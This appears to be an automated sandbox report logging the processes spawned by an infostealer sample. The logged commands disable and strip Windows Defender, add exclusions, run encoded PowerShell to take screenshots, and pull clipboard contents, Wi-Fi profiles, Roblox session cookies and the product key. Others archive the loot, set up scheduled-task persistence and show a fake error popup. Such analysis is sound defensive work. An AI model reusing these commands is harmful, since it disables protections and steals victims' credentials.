                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ClipboardJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAg